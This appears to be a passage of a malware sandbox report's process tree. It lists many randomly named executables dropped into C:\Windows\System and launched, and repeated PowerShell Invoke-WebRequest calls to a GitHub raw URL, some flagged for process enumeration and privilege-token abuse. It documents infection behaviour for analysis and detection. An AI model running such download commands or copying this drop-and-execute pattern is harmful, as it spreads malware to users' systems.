powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:1396

C:\Windows\System\VitttSG.exe
C:\Windows\System\VitttSG.exe
2⤵
- Executes dropped EXE
PID:1532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2424

C:\Windows\System\ILOfGqd.exe
C:\Windows\System\ILOfGqd.exe
2⤵
- Executes dropped EXE
PID:1144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2220

C:\Windows\System\eyIRMuD.exe
C:\Windows\System\eyIRMuD.exe
2⤵
- Executes dropped EXE
PID:1904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2336

C:\Windows\System\ochkuap.exe
C:\Windows\System\ochkuap.exe
2⤵
- Executes dropped EXE
PID:2064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2292

C:\Windows\System\BkpbJeA.exe
C:\Windows\System\BkpbJeA.exe
2⤵
- Executes dropped EXE
PID:2112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776

C:\Windows\System\nHPajtU.exe
C:\Windows\System\nHPajtU.exe
2⤵
- Executes dropped EXE
PID:2156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2876

C:\Windows\System\CLZGZLL.exe
C:\Windows\System\CLZGZLL.exe
2⤵
- Executes dropped EXE
PID:2316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2680

C:\Windows\System\VlRZgwr.exe
C:\Windows\System\VlRZgwr.exe
2⤵
- Executes dropped EXE
PID:2232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2616

C:\Windows\System\RQQdcok.exe
C:\Windows\System\RQQdcok.exe
2⤵
- Executes dropped EXE
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820

C:\Windows\System\dOTJawA.exe
C:\Windows\System\dOTJawA.exe
2⤵
- Executes dropped EXE
PID:2380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2608

C:\Windows\System\QhZDqEy.exe
C:\Windows\System\QhZDqEy.exe
2⤵
- Executes dropped EXE
PID:2472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2692

C:\Windows\System\jYzHJZR.exe
C:\Windows\System\jYzHJZR.exe
2⤵
- Executes dropped EXE
PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2792

C:\Windows\System\hYprFdm.exe
C:\Windows\System\hYprFdm.exe
2⤵
- Executes dropped EXE
PID:2540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2812

C:\Windows\System\qFoYVgD.exe
C:\Windows\System\qFoYVgD.exe
2⤵
- Executes dropped EXE
PID:2496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2784

C:\Windows\System\ZVNRBHz.exe
C:\Windows\System\ZVNRBHz.exe
2⤵
- Executes dropped EXE
PID:2552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2828

C:\Windows\System\UraOoDW.exe
C:\Windows\System\UraOoDW.exe
2⤵
- Executes dropped EXE
PID:2572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2944

C:\Windows\System\LyLhbTn.exe
C:\Windows\System\LyLhbTn.exe
2⤵
- Executes dropped EXE
PID:2632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:3024

C:\Windows\System\ObadjqA.exe
C:\Windows\System\ObadjqA.exe
2⤵
- Executes dropped EXE
PID:2652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960

C:\Windows\System\PwviUSf.exe
C:\Windows\System\PwviUSf.exe
2⤵
- Executes dropped EXE
PID:2704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\System\LfukXhI.exe
C:\Windows\System\LfukXhI.exe
2⤵
- Executes dropped EXE
PID:2736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2952

C:\Windows\System\xXJEdQn.exe
C:\Windows\System\xXJEdQn.exe
2⤵
- Executes dropped EXE
PID:2744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2936

C:\Windows\System\ChPAFKb.exe
C:\Windows\System\ChPAFKb.exe
2⤵
- Executes dropped EXE
PID:2768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:3008

C:\Windows\System\URIDPbr.exe
C:\Windows\System\URIDPbr.exe
2⤵
- Executes dropped EXE
PID:2800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2096

C:\Windows\System\fFSctOt.exe
C:\Windows\System\fFSctOt.exe
2⤵
- Executes dropped EXE
PID:2196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512

C:\Windows\System\wKYDsEo.exe
C:\Windows\System\wKYDsEo.exe
2⤵
- Executes dropped EXE
PID:3156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:3364

C:\Windows\System\IImXlxR.exe
C:\Windows\System\IImXlxR.exe
2⤵
- Executes dropped EXE
PID:3456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:4984

C:\Windows\System\YKfqNAU.exe
C:\Windows\System\YKfqNAU.exe
2⤵
- Executes dropped EXE
PID:3448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:3608

C:\Windows\System\pRaSlIY.exe
C:\Windows\System\pRaSlIY.exe
2⤵
- Executes dropped EXE
PID:3440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:5720

C:\Windows\System\AgXiazJ.exe
C:\Windows\System\AgXiazJ.exe
2⤵
- Executes dropped EXE
PID:3432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:3600

C:\Windows\System\pXQaFEg.exe
C:\Windows\System\pXQaFEg.exe
2⤵
- Executes dropped EXE
PID:3424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7240

C:\Windows\System\CWnqRZb.exe
C:\Windows\System\CWnqRZb.exe
2⤵
- Executes dropped EXE
PID:3416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:3592

C:\Windows\System\gIZbSZP.exe
C:\Windows\System\gIZbSZP.exe
2⤵
PID:3576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6004

C:\Windows\System\GwbfQkI.exe
C:\Windows\System\GwbfQkI.exe
2⤵
PID:3568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:4220

C:\Windows\System\tcCkFMD.exe
C:\Windows\System\tcCkFMD.exe
2⤵
- Executes dropped EXE
PID:3560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:5992

C:\Windows\System\Frjmusu.exe
C:\Windows\System\Frjmusu.exe
2⤵
PID:3552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:4364

C:\Windows\System\oOhLbvA.exe
C:\Windows\System\oOhLbvA.exe
2⤵
- Executes dropped EXE
PID:3544

C:\Windows\System\onTlDzT.exe
C:\Windows\System\onTlDzT.exe
2⤵
PID:3520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:4228

C:\Windows\System\zgyNlkp.exe
C:\Windows\System\zgyNlkp.exe
2⤵
PID:3504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:4380

C:\Windows\System\AsEfkMj.exe
C:\Windows\System\AsEfkMj.exe
2⤵
PID:3488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:4372

C:\Windows\System\DmptugK.exe
C:\Windows\System\DmptugK.exe
2⤵
PID:3648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:4636

C:\Windows\System\CPqXIrP.exe
C:\Windows\System\CPqXIrP.exe
2⤵
PID:3640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:4020

C:\Windows\System\kNXGkTk.exe
C:\Windows\System\kNXGkTk.exe
2⤵
PID:3632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6012

C:\Windows\System\bRgdKYn.exe
C:\Windows\System\bRgdKYn.exe
2⤵
- Executes dropped EXE
PID:3480

C:\Windows\System\qYSRxkC.exe
C:\Windows\System\qYSRxkC.exe
2⤵
- Executes dropped EXE
PID:3464

C:\Windows\System\wYSBTus.exe
C:\Windows\System\wYSBTus.exe
2⤵
- Executes dropped EXE
PID:3352

C:\Windows\System\eYcNrFb.exe
C:\Windows\System\eYcNrFb.exe
2⤵
- Executes dropped EXE
PID:3296

C:\Windows\System\OvykZaI.exe
C:\Windows\System\OvykZaI.exe
2⤵
- Executes dropped EXE
PID:3288

C:\Windows\System\trMBKQR.exe
C:\Windows\System\trMBKQR.exe
2⤵
- Executes dropped EXE
PID:3280

C:\Windows\System\gyRgTAH.exe
C:\Windows\System\gyRgTAH.exe
2⤵
- Executes dropped EXE
PID:3272

C:\Windows\System\JCOEbbO.exe
C:\Windows\System\JCOEbbO.exe
2⤵
- Executes dropped EXE
PID:3264

C:\Windows\System\WNKNINp.exe
C:\Windows\System\WNKNINp.exe
2⤵
- Executes dropped EXE
PID:3256

C:\Windows\System\uTiRIAc.exe
C:\Windows\System\uTiRIAc.exe
2⤵
- Executes dropped EXE
PID:3248

C:\Windows\System\GyPnkXp.exe
C:\Windows\System\GyPnkXp.exe
2⤵
- Executes dropped EXE
PID:3240

C:\Windows\System\ILBsjED.exe
C:\Windows\System\ILBsjED.exe
2⤵
- Executes dropped EXE
PID:3232

C:\Windows\System\lJiomPC.exe
C:\Windows\System\lJiomPC.exe
2⤵
PID:3880

C:\Windows\System\XlhfSxH.exe
C:\Windows\System\XlhfSxH.exe
2⤵
PID:3976

C:\Windows\System\ZPYYwhJ.exe
C:\Windows\System\ZPYYwhJ.exe
2⤵
PID:4012

C:\Windows\System\bLXVUYq.exe
C:\Windows\System\bLXVUYq.exe
2⤵
PID:4004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:5132

C:\Windows\System\szmNmTh.exe
C:\Windows\System\szmNmTh.exe
2⤵
PID:3996

C:\Windows\System\PzltNBD.exe
C:\Windows\System\PzltNBD.exe
2⤵
PID:3988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:5920

C:\Windows\System\LqcURjW.exe
C:\Windows\System\LqcURjW.exe
2⤵
PID:3968

C:\Windows\System\LZEoyFm.exe
C:\Windows\System\LZEoyFm.exe
2⤵
PID:4060

C:\Windows\System\WBvorkm.exe
C:\Windows\System\WBvorkm.exe
2⤵
PID:872

C:\Windows\System\FAQaEaI.exe
C:\Windows\System\FAQaEaI.exe
2⤵
PID:3908

C:\Windows\System\sTpZAON.exe
C:\Windows\System\sTpZAON.exe
2⤵
PID:748

C:\Windows\System\oDSpYcp.exe
C:\Windows\System\oDSpYcp.exe
2⤵
PID:724

C:\Windows\System\KTsanfN.exe
C:\Windows\System\KTsanfN.exe
2⤵
PID:316

C:\Windows\System\ETLNHPi.exe
C:\Windows\System\ETLNHPi.exe
2⤵
PID:1788

C:\Windows\System\TSueHph.exe
C:\Windows\System\TSueHph.exe
2⤵
PID:1680

C:\Windows\System\AqDWLKF.exe
C:\Windows\System\AqDWLKF.exe
2⤵
PID:1924

C:\Windows\System\iEfSqHa.exe
C:\Windows\System\iEfSqHa.exe
2⤵
PID:4092

C:\Windows\System\hivzdoc.exe
C:\Windows\System\hivzdoc.exe
2⤵
PID:4084

C:\Windows\System\ffzfpii.exe
C:\Windows\System\ffzfpii.exe
2⤵
PID:4076

C:\Windows\System\VmmaTdx.exe
C:\Windows\System\VmmaTdx.exe
2⤵
PID:4068

C:\Windows\System\unsWRUk.exe
C:\Windows\System\unsWRUk.exe
2⤵
PID:4052

C:\Windows\System\nmegCNk.exe
C:\Windows\System\nmegCNk.exe
2⤵
PID:4044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6988

C:\Windows\System\XXJvpyg.exe
C:\Windows\System\XXJvpyg.exe
2⤵
PID:4036

C:\Windows\System\fiHLvSC.exe
C:\Windows\System\fiHLvSC.exe
2⤵
PID:3960

C:\Windows\System\QodhUHH.exe
C:\Windows\System\QodhUHH.exe
2⤵
PID:3952

C:\Windows\System\sgfyreg.exe
C:\Windows\System\sgfyreg.exe
2⤵
PID:3944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7980

C:\Windows\System\NBloSJO.exe
C:\Windows\System\NBloSJO.exe
2⤵
PID:4212

C:\Windows\System\FmvDIgi.exe
C:\Windows\System\FmvDIgi.exe
2⤵
PID:4204

C:\Windows\System\cSFpChZ.exe
C:\Windows\System\cSFpChZ.exe
2⤵
PID:4196

C:\Windows\System\KXxPnKU.exe
C:\Windows\System\KXxPnKU.exe
2⤵
PID:4188

C:\Windows\System\TidcQUV.exe
C:\Windows\System\TidcQUV.exe
2⤵
PID:4180

C:\Windows\System\XMdCCqM.exe
C:\Windows\System\XMdCCqM.exe
2⤵
PID:4172

C:\Windows\System\loHOaVT.exe
C:\Windows\System\loHOaVT.exe
2⤵
PID:4164

C:\Windows\System\DHDgOgt.exe
C:\Windows\System\DHDgOgt.exe
2⤵
PID:4252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:5288

C:\Windows\System\hCONSmg.exe
C:\Windows\System\hCONSmg.exe
2⤵
PID:4156

C:\Windows\System\WpPgzVO.exe
C:\Windows\System\WpPgzVO.exe
2⤵
PID:4148

C:\Windows\System\pxhrkkd.exe
C:\Windows\System\pxhrkkd.exe
2⤵
PID:4356

C:\Windows\System\yTkOLvk.exe
C:\Windows\System\yTkOLvk.exe
2⤵
PID:4348

C:\Windows\System\hbpIQEZ.exe
C:\Windows\System\hbpIQEZ.exe
2⤵
PID:4340

C:\Windows\System\wxDAgUA.exe
C:\Windows\System\wxDAgUA.exe
2⤵
PID:4332

C:\Windows\System\nOECoZr.exe
C:\Windows\System\nOECoZr.exe
2⤵
PID:4324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:10936

C:\Windows\System\SodykRY.exe
C:\Windows\System\SodykRY.exe
2⤵
PID:4316

C:\Windows\System\CmFezsW.exe
C:\Windows\System\CmFezsW.exe
2⤵
PID:4308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11356

C:\Windows\System\tqFeloU.exe
C:\Windows\System\tqFeloU.exe
2⤵
PID:4300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7060

C:\Windows\System\hmHORNU.exe
C:\Windows\System\hmHORNU.exe
2⤵
PID:4292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11372

C:\Windows\System\vdcFykk.exe
C:\Windows\System\vdcFykk.exe
2⤵
PID:4284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7096

C:\Windows\System\gsatwqI.exe
C:\Windows\System\gsatwqI.exe
2⤵
PID:4276

C:\Windows\System\AcMXBUr.exe
C:\Windows\System\AcMXBUr.exe
2⤵
PID:4268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7104

C:\Windows\System\bRVzyIH.exe
C:\Windows\System\bRVzyIH.exe
2⤵
PID:4260

C:\Windows\System\NVxpcnn.exe
C:\Windows\System\NVxpcnn.exe
2⤵
PID:4136

C:\Windows\System\BbzFyZd.exe
C:\Windows\System\BbzFyZd.exe
2⤵
PID:4128

C:\Windows\System\sscqJnP.exe
C:\Windows\System\sscqJnP.exe
2⤵
PID:4120

C:\Windows\System\OyNdzfF.exe
C:\Windows\System\OyNdzfF.exe
2⤵
PID:4112

C:\Windows\System\wSaYQJs.exe
C:\Windows\System\wSaYQJs.exe
2⤵
PID:4104

C:\Windows\System\SxKXpJA.exe
C:\Windows\System\SxKXpJA.exe
2⤵
PID:752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6932

C:\Windows\System\AIDsSbt.exe
C:\Windows\System\AIDsSbt.exe
2⤵
PID:3936

C:\Windows\System\shwFVQV.exe
C:\Windows\System\shwFVQV.exe
2⤵
PID:3928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6180

C:\Windows\System\ofQDvNA.exe
C:\Windows\System\ofQDvNA.exe
2⤵
PID:4504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:5828

C:\Windows\System\eOsZKdV.exe
C:\Windows\System\eOsZKdV.exe
2⤵
PID:4496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7132

C:\Windows\System\voCrsYw.exe
C:\Windows\System\voCrsYw.exe
2⤵
PID:4484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6532

C:\Windows\System\hClXljs.exe
C:\Windows\System\hClXljs.exe
2⤵
PID:4476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7140

C:\Windows\System\axTlROc.exe
C:\Windows\System\axTlROc.exe
2⤵
PID:4468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7068

C:\Windows\System\fiNQGxd.exe
C:\Windows\System\fiNQGxd.exe
2⤵
PID:4460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7164

C:\Windows\System\dYFHfBq.exe
C:\Windows\System\dYFHfBq.exe
2⤵
PID:4452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7084

C:\Windows\System\xgsldpl.exe
C:\Windows\System\xgsldpl.exe
2⤵
PID:4444

C:\Windows\System\priMFTF.exe
C:\Windows\System\priMFTF.exe
2⤵
PID:4436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7148

C:\Windows\System\gBZfduX.exe
C:\Windows\System\gBZfduX.exe
2⤵
PID:4428

C:\Windows\System\miAklrf.exe
C:\Windows\System\miAklrf.exe
2⤵
PID:4420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7156

C:\Windows\System\XjVYAlD.exe
C:\Windows\System\XjVYAlD.exe
2⤵
PID:4412

C:\Windows\System\bIAZdGA.exe
C:\Windows\System\bIAZdGA.exe
2⤵
PID:4404

C:\Windows\System\oInNKHM.exe
C:\Windows\System\oInNKHM.exe
2⤵
PID:4516

C:\Windows\System\DOaTUHu.exe
C:\Windows\System\DOaTUHu.exe
2⤵
PID:4616

C:\Windows\System\tKOZDbz.exe
C:\Windows\System\tKOZDbz.exe
2⤵
PID:4608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11508

C:\Windows\System\OexxtTq.exe
C:\Windows\System\OexxtTq.exe
2⤵
PID:4600

C:\Windows\System\FZREBCq.exe
C:\Windows\System\FZREBCq.exe
2⤵
PID:4592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11404

C:\Windows\System\bVlxvgX.exe
C:\Windows\System\bVlxvgX.exe
2⤵
PID:4584

C:\Windows\System\gDivqks.exe
C:\Windows\System\gDivqks.exe
2⤵
PID:4576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11396

C:\Windows\System\XapIZxq.exe
C:\Windows\System\XapIZxq.exe
2⤵
PID:4564

C:\Windows\System\qmTRFmN.exe
C:\Windows\System\qmTRFmN.exe
2⤵
PID:4556

C:\Windows\System\vBUYrZy.exe
C:\Windows\System\vBUYrZy.exe
2⤵
PID:4548

C:\Windows\System\JQnYvpZ.exe
C:\Windows\System\JQnYvpZ.exe
2⤵
PID:4540

C:\Windows\System\BcgrLAJ.exe
C:\Windows\System\BcgrLAJ.exe
2⤵
PID:4532

C:\Windows\System\pjBFPXb.exe
C:\Windows\System\pjBFPXb.exe
2⤵
PID:4524

C:\Windows\System\VoruyZo.exe
C:\Windows\System\VoruyZo.exe
2⤵
PID:4744

C:\Windows\System\PQmsQrL.exe
C:\Windows\System\PQmsQrL.exe
2⤵
PID:4736

C:\Windows\System\vHIipZK.exe
C:\Windows\System\vHIipZK.exe
2⤵
PID:4728

C:\Windows\System\IKUbOQP.exe
C:\Windows\System\IKUbOQP.exe
2⤵
PID:4720

C:\Windows\System\mjygZQn.exe
C:\Windows\System\mjygZQn.exe
2⤵
PID:4712

C:\Windows\System\wblNRtD.exe
C:\Windows\System\wblNRtD.exe
2⤵
PID:4704

C:\Windows\System\CcaLaUy.exe
C:\Windows\System\CcaLaUy.exe
2⤵
PID:4752

C:\Windows\System\MiEpSLz.exe
C:\Windows\System\MiEpSLz.exe
2⤵
PID:4696

C:\Windows\System\eFlOAkh.exe
C:\Windows\System\eFlOAkh.exe
2⤵
PID:4688

C:\Windows\System\RomOAcZ.exe
C:\Windows\System\RomOAcZ.exe
2⤵
PID:4680

C:\Windows\System\uaECDoX.exe
C:\Windows\System\uaECDoX.exe
2⤵
PID:4672

C:\Windows\System\MpTClnN.exe
C:\Windows\System\MpTClnN.exe
2⤵
PID:4664

C:\Windows\System\zSnYoTm.exe
C:\Windows\System\zSnYoTm.exe
2⤵
PID:4656

C:\Windows\System\JhKrDLP.exe
C:\Windows\System\JhKrDLP.exe
2⤵
PID:4816

C:\Windows\System\EhuFOSC.exe
C:\Windows\System\EhuFOSC.exe
2⤵
PID:4808

C:\Windows\System\wAsTJAY.exe
C:\Windows\System\wAsTJAY.exe
2⤵
PID:4800

C:\Windows\System\eigKbQw.exe
C:\Windows\System\eigKbQw.exe
2⤵
PID:4792

C:\Windows\System\bEdwVHx.exe
C:\Windows\System\bEdwVHx.exe
2⤵
PID:4784

C:\Windows\System\mcEqGmQ.exe
C:\Windows\System\mcEqGmQ.exe
2⤵
PID:4776

C:\Windows\System\myNIHBF.exe
C:\Windows\System\myNIHBF.exe
2⤵
PID:4768

C:\Windows\System\PNFItRQ.exe
C:\Windows\System\PNFItRQ.exe
2⤵
PID:4760

C:\Windows\System\QTFMMfP.exe
C:\Windows\System\QTFMMfP.exe
2⤵
PID:4648

C:\Windows\System\VdQpdJV.exe
C:\Windows\System\VdQpdJV.exe
2⤵
PID:4932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6172

C:\Windows\System\NEphNgQ.exe
C:\Windows\System\NEphNgQ.exe
2⤵
PID:4924

C:\Windows\System\TtoQCDQ.exe
C:\Windows\System\TtoQCDQ.exe
2⤵
PID:4916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11468

C:\Windows\System\ytVSUpb.exe
C:\Windows\System\ytVSUpb.exe
2⤵
PID:4908

C:\Windows\System\WmOuzwH.exe
C:\Windows\System\WmOuzwH.exe
2⤵
PID:4900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6444

C:\Windows\System\RNHNgeF.exe
C:\Windows\System\RNHNgeF.exe
2⤵
PID:4964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6020

C:\Windows\System\zBXKXqa.exe
C:\Windows\System\zBXKXqa.exe
2⤵
PID:4956

C:\Windows\System\UtOzpFQ.exe
C:\Windows\System\UtOzpFQ.exe
2⤵
PID:4948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6124

C:\Windows\System\LxNsHzr.exe
C:\Windows\System\LxNsHzr.exe
2⤵
PID:4940

C:\Windows\System\pwsulAc.exe
C:\Windows\System\pwsulAc.exe
2⤵
PID:4888

C:\Windows\System\zwZphZC.exe
C:\Windows\System\zwZphZC.exe
2⤵
PID:4880

C:\Windows\System\AjHQJaQ.exe
C:\Windows\System\AjHQJaQ.exe
